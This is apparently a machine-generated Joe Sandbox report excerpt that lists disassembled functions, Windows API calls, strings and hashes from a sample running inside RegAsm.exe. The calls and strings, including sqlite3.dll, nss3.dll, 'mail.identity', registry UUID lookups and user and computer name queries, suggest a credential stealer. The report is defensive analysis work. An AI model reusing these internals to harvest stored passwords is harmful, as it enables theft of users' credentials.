                                                                                                                                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                      • API String ID: 2221118986-515162456
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                      • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3503910906-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3798638045-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                                      • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                                                      • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                                                      • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                                      • String ID: >$>$>
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                                                      • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                                                                                      • String ID: C@$mail.identity
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                                                      • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                                                      • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                                      • String ID: Ul@
                                                                                                                                                                                                                      • API String ID: 270934217-715280498
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 203655857-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                      • String ID: </%s>
                                                                                                                                                                                                                      • API String ID: 3699762281-259020660
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                                                      • String ID: recovered %d pages from %s
                                                                                                                                                                                                                      • API String ID: 985450955-1623757624
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _ultoasprintf
                                                                                                                                                                                                                      • String ID: %s %s %s
                                                                                                                                                                                                                      • API String ID: 432394123-3850900253
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00409919
                                                                                                                                                                                                                      • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                                                                      • String ID: N\@
                                                                                                                                                                                                                      • API String ID: 568519121-3851889168
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                      • String ID: menu_%d
                                                                                                                                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _msizerealloc
                                                                                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                                                      • String ID: _lng.ini
                                                                                                                                                                                                                      • API String ID: 3334749609-1948609170
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                                                                                      • String ID: sqlite3.dll
                                                                                                                                                                                                                      • API String ID: 1983510840-1155512374
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                      • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                                                      • API String ID: 1029625771-543337301
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                                                      • String ID: A4@$Server Details
                                                                                                                                                                                                                      • API String ID: 1096422788-4071850762
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042C932
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040849A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004084D2
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,770145ED,?,00000000), ref: 0040858F
                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,770145ED,?,00000000), ref: 004085BA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3110682361-0
                                                                                                                                                                                                                      • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                                                      • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3510742995-0
                                                                                                                                                                                                                      • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                      • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                      • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                                                      • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040797A
                                                                                                                                                                                                                      • free.MSVCRT ref: 0040799A
                                                                                                                                                                                                                        • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                                                        • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                                                        • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                                                                                                                      • free.MSVCRT ref: 004079BD
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,0044357F,00000000,?,?,00000000,0044386F,?,?), ref: 004079DD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                                                                      • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                                                      • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004078FC
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407904
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 379999529-0
                                                                                                                                                                                                                      • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                                                      • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 97 407c79-407dc2 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 98 407dc4 97->98 99 407df8-407dfb 97->99 100 407dca-407dd3 98->100 101 407e2c-407e30 99->101 102 407dfd-407e06 99->102 103 407dd5-407dd9 100->103 104 407dda-407df6 100->104 105 407e08-407e0c 102->105 106 407e0d-407e2a 102->106 103->104 104->99 104->100 105->106 106->101 106->102
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407CDB
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407CEF
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407D09
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407D1E
                                                                                                                                                                                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407D91
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407DA0
